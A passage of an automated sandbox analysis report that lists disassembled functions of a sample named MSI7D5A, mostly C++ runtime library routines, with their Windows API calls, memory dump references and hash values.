                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                      • String ID: $+xv
                                                      • API String ID: 2939335142-1686923651
                                                      • Opcode ID: 1657b2cea1977c08998e612176677097d934de6f1b87b67f2038f88d6a735f25
                                                      • Instruction ID: 8dc44bdf719398f718fcb4bd969c6664b7940774b89222d2f53fa9bb2ee62d7f
                                                      • Opcode Fuzzy Hash: 1657b2cea1977c08998e612176677097d934de6f1b87b67f2038f88d6a735f25
                                                      • Instruction Fuzzy Hash: 7521C4B1904B92AEDB25DF75C49077BBEF8BB08701F04455AE859C7A42D734EA05CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A5FFEA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Mpunct$H_prolog3
                                                      • String ID: $+xv
                                                      • API String ID: 4281374311-1686923651
                                                      • Opcode ID: 65d75d525a8093c9fdeb71e6e55d26668ff064672e2d94ae0ec331d70511cfab
                                                      • Instruction ID: 6be45d5398641390e26e1359f7f5581d36a47de63047fd6b54cc943bda3aa1fa
                                                      • Opcode Fuzzy Hash: 65d75d525a8093c9fdeb71e6e55d26668ff064672e2d94ae0ec331d70511cfab
                                                      • Instruction Fuzzy Hash: 6521A4B1904B516EDB25DF74C590B7BBEF8BB0C301F04455AE499C7A42D734EA45CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A424C0 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00A41434,?,00000000), ref: 00A42569
                                                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00A41434,?,00000000), ref: 00A42589
                                                      • LocalFree.KERNEL32(?,00A41434,?,00000000), ref: 00A425DF
                                                      • CloseHandle.KERNEL32(00000000,838A949E,?,00000000,00A83C40,000000FF,00000008,?,?,?,?,00A41434,?,00000000), ref: 00A42633
                                                      • LocalFree.KERNEL32(?,838A949E,?,00000000,00A83C40,000000FF,00000008,?,?,?,?,00A41434), ref: 00A42647
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Local$AllocFree$CloseHandle
                                                      • String ID:
                                                      • API String ID: 1291444452-0
                                                      • Opcode ID: ab758ee3404b59a48026552beab71fac4287d3143100e1e60638f98c895b5a5a
                                                      • Instruction ID: a68ee21da76da90328ea50180ef0e6d085a36ce670ffebd28b16d720a1da80d5
                                                      • Opcode Fuzzy Hash: ab758ee3404b59a48026552beab71fac4287d3143100e1e60638f98c895b5a5a
                                                      • Instruction Fuzzy Hash: 1C41297A6003119BC714DF68D894B5ABBE8EBC9360F61072AF526C72E0EB34D84487A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A81D9B Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetConsoleOutputCP.KERNEL32(838A949E,?,00000000,?), ref: 00A81DFE
                                                        • Part of subcall function 00A7A9BB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00A76F5E,?,00000000,-00000008), ref: 00A7AA67
                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00A82059
                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00A820A1
                                                      • GetLastError.KERNEL32 ref: 00A82144
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                      • String ID:
                                                      • API String ID: 2112829910-0
                                                      • Opcode ID: 7b33e54d6d1dbc7056c1644f08c324ed54a4ee731b9c4648edbe10d964d1821b
                                                      • Instruction ID: f792b8ee9dd44281905b9e4a367da740a21b3fcaf001366c4e3db139999d5319
                                                      • Opcode Fuzzy Hash: 7b33e54d6d1dbc7056c1644f08c324ed54a4ee731b9c4648edbe10d964d1821b
                                                      • Instruction Fuzzy Hash: E2D16975E002589FCF15DFA8D880AEDBBB9FF09310F28462AE955EB351D730A942CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A535F7 Relevance: 6.3, APIs: 4, Instructions: 282COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: _strcspn$H_prolog3_ctype
                                                      • String ID:
                                                      • API String ID: 838279627-0
                                                      • Opcode ID: 6aa27642fc5270d720dc7d0e7a5558a468a11e3ac65f48fda19c770c80f8ddc6
                                                      • Instruction ID: b168914172f8fce70e9d78447f33e04e11ce874c11f331fb2a2b18cbe5b3cf0e
                                                      • Opcode Fuzzy Hash: 6aa27642fc5270d720dc7d0e7a5558a468a11e3ac65f48fda19c770c80f8ddc6
                                                      • Instruction Fuzzy Hash: B2B16DB6D00249DFDF15DF98C981AEEBBB5FF88351F144019EC05AB251D7309A5ACBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A4DA6F Relevance: 6.3, APIs: 4, Instructions: 279COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: _strcspn$H_prolog3_ctype
                                                      • String ID:
                                                      • API String ID: 838279627-0
                                                      • Opcode ID: af0e7102ce735ebe94e500f7015e6f38f11a7d707b8fb52e92d363fa26c09361
                                                      • Instruction ID: 1abc5d3907d20cec4d5548b8faa8e1d219af1d9fa810e0aadf1939094176dade
                                                      • Opcode Fuzzy Hash: af0e7102ce735ebe94e500f7015e6f38f11a7d707b8fb52e92d363fa26c09361
                                                      • Instruction Fuzzy Hash: E2B16E79D00249DFDF10DFA4C981AEEBBB9FF88310F144029E815AB215D770AE56CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A65A58 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: AdjustPointer
                                                      • String ID:
                                                      • API String ID: 1740715915-0
                                                      • Opcode ID: 8ba550a0575bcd05a47209142199944d82c9656a19324a8e0d6be70b89e41145
                                                      • Instruction ID: a8d91fc0f0e59f168aa4cf26d24ad89525f2e9f87ec045df474776742886b857
                                                      • Opcode Fuzzy Hash: 8ba550a0575bcd05a47209142199944d82c9656a19324a8e0d6be70b89e41145
                                                      • Instruction Fuzzy Hash: 1651C072E01B06AFDB299F64D985BBAB7B4EF55310F14462DE90587291F731EC80CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A724E8 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cbb141af129f6885121c60a4b1c47c2aadba4b0ac086061fb9191e83a928cd27
                                                      • Instruction ID: 8d8d31b9fa27866732a3bf0829f9581bf5883932050efa4f1991edb1deca1c7d
                                                      • Opcode Fuzzy Hash: cbb141af129f6885121c60a4b1c47c2aadba4b0ac086061fb9191e83a928cd27
                                                      • Instruction Fuzzy Hash: C2216D71604205AFDB21AF71CDA1E6F7BB9EF44364710C919F8199B251EB35ED0097A0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A46FB0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,00000002,80004005,S-1-5-18,00000008), ref: 00A46FB7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast
                                                      • String ID: > returned:$Call to ShellExecute() for verb<$Last error=
                                                      • API String ID: 1452528299-1781106413
                                                      • Opcode ID: 27b81a3d5850286efa62449d08802be0c2e0b6a3b1767a8736b504d04f0d4f42
                                                      • Instruction ID: a23bfaabd661bee5b63a291f0adb2e3a2f29a56b3346735dc40cb224a363c5b6
                                                      • Opcode Fuzzy Hash: 27b81a3d5850286efa62449d08802be0c2e0b6a3b1767a8736b504d04f0d4f42
                                                      • Instruction Fuzzy Hash: BB216F5DB1026186CB741F78D41133EA2E0EF94758F65187FE8C9DB391EBB98C8283A5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A4CCE0 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,838A949E), ref: 00A4CD1C
                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00A4CD3C
                                                      • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00A4CD6D
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00A4CD86
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: File$CloseCreateHandlePointerWrite
                                                      • String ID:
                                                      • API String ID: 3604237281-0
                                                      • Opcode ID: db2e2fdc331c0fad1df1dc01f8eb6d7c0a697c74bbed1137b96ddd3dc2fd124a
                                                      • Instruction ID: 04707f2ef3db4de41ebeaa4b5b2f2d07ddc1d4dce360ece4e96bdb21cd2cc27c
                                                      • Opcode Fuzzy Hash: db2e2fdc331c0fad1df1dc01f8eb6d7c0a697c74bbed1137b96ddd3dc2fd124a
                                                      • Instruction Fuzzy Hash: D021AF74A41214AFD720CF54DC09FAEBBB8EB05B24F200269F514BB2D0D7B46A0587E4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A527A2 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A527A9
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A527B3
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • std::_Facet_Register.LIBCPMT ref: 00A52804
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A52824
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                      • String ID:
                                                      • API String ID: 2854358121-0
                                                      • Opcode ID: 281501fea84f055a34b7e53667eead6a8c588fa3e7a3b04efdb1eac53d89b1e6
                                                      • Instruction ID: f51482af185402995ee9dd9be2370ec046921cbd4290a4b74c115ea29221424b
                                                      • Opcode Fuzzy Hash: 281501fea84f055a34b7e53667eead6a8c588fa3e7a3b04efdb1eac53d89b1e6
                                                      • Instruction Fuzzy Hash: 0901D2369002259BCF15FBB4DA51ABE77B1BF94721F240409FD0167292DF749E0AC791
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A4D7E7 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A4D7EE
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A4D7F8
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • std::_Facet_Register.LIBCPMT ref: 00A4D849
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A4D869
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                      • String ID:
                                                      • API String ID: 2854358121-0
                                                      • Opcode ID: 7cae663146e313b7e3b4c2f380742d27f8fb555bc26766c331492ffae0566b73
                                                      • Instruction ID: c8aa271b8c2ef1bbecd878891ec0963d9152450400029329946eb66452b34285
                                                      • Opcode Fuzzy Hash: 7cae663146e313b7e3b4c2f380742d27f8fb555bc26766c331492ffae0566b73
                                                      • Instruction Fuzzy Hash: 2A019E3AD00119DFCB15FBA4DA42ABEB7B1BFD4720F240449F8116B291DF749E468B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A5270D Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A52714
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A5271E
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • std::_Facet_Register.LIBCPMT ref: 00A5276F
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A5278F
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                      • String ID:
                                                      • API String ID: 2854358121-0
                                                      • Opcode ID: 747b20a6889f11d899e508037e10883cf0dc0b443bce511c341f6b70fe15d117
                                                      • Instruction ID: 82518954b271b9fe3d459f1a09d3ddb10108ec591b6190b4ff0a4cd2ad0a4c40
                                                      • Opcode Fuzzy Hash: 747b20a6889f11d899e508037e10883cf0dc0b443bce511c341f6b70fe15d117
                                                      • Instruction Fuzzy Hash: F301C036900115DBCF04FBA49A45AAEB7B1BF98721F240509F81067292DF749E0A8B90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A4D752 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A4D759
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A4D763
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • std::_Facet_Register.LIBCPMT ref: 00A4D7B4
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A4D7D4
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                      • String ID:
                                                      • API String ID: 2854358121-0
                                                      • Opcode ID: f7be7e9ce43be85aee98cb1e00a321b03f87d4917b2a4ee85cfa8d9ca17abf58
                                                      • Instruction ID: 7598f685d73657cf2aadcbca45be1b91e4c3fe76bad5bd2d27069724dba24f44
                                                      • Opcode Fuzzy Hash: f7be7e9ce43be85aee98cb1e00a321b03f87d4917b2a4ee85cfa8d9ca17abf58
                                                      • Instruction Fuzzy Hash: B301DE3A9001199FCF04FBA4DA42AAE77B1BFC0724F240809F8116B291DF749E05CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A528CC Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A528D3
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A528DD
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • std::_Facet_Register.LIBCPMT ref: 00A5292E
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A5294E
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                      • String ID:
                                                      • API String ID: 2854358121-0
                                                      • Opcode ID: 640da8968a2aa261a6b3c86f9ae0d82c660b97e57dfa84e6718b30a47a129038
                                                      • Instruction ID: 1144f1b53c3e954f2e191796f8cc863480b24caab88c104302b14eac411619a6
                                                      • Opcode Fuzzy Hash: 640da8968a2aa261a6b3c86f9ae0d82c660b97e57dfa84e6718b30a47a129038
                                                      • Instruction Fuzzy Hash: 5101C036A00225DBCB14FBA49A51ABE77B1BFC5721F240809F81067392CF749E0A87D0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A52837 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A5283E
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A52848
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • std::_Facet_Register.LIBCPMT ref: 00A52899
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A528B9
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                      • String ID:
                                                      • API String ID: 2854358121-0
                                                      • Opcode ID: 3177c0dd4531913212ecae0cd20db83aefa790594676ec9b61470566a670a364
                                                      • Instruction ID: 7f3047f3d81e519c1b7ce13078a86cbe43e2e4bd48d44c52d2f40e046b728272
                                                      • Opcode Fuzzy Hash: 3177c0dd4531913212ecae0cd20db83aefa790594676ec9b61470566a670a364
                                                      • Instruction Fuzzy Hash: 2001C036900125DFCB14FBA4DA41BBE77B1BF80721F240909F8106B292DF749E098B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A5E96D Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A5E974
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A5E97E
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • std::_Facet_Register.LIBCPMT ref: 00A5E9CF
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A5E9EF
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
